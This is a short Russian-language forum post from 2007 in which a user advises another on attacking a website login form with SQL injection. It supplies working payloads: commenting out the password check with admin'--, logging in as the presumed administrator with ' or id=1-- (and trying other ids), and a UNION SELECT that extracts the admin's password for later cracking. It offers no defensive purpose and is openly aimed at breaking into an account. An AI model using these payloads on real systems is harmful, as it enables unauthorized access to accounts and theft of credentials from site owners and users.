30.07.2007, 16:09
|
|
Новичок
Регистрация: 20.01.2007
Сообщений: 25
С нами:
10160498
Репутация:
8
|
|
Я бы попробовал:
SELECT id FROM Users WHERE login='admin'--
т.е. login:admin'--
или
SELECT id FROM Users WHERE login='' or id=1--
т.е. login:' or id=1--
Думаю у админа идентификатор единичка, так что прокатит, если что перебери другие.
А может исчо енто поможет:
SELECT id FROM Users WHERE login='' UNION SELECT password FROM Users WHERE id=1--
т.е. login:' UNION SELECT password FROM Users WHERE id=1--
Потом расшифруешь...
А при 1=1 пишет "Здраствуйте, " наверно потому, что идентификатор ноль стоит у гостя, и именно этот пользователь и является первым подходящим под запрос...
|
|
|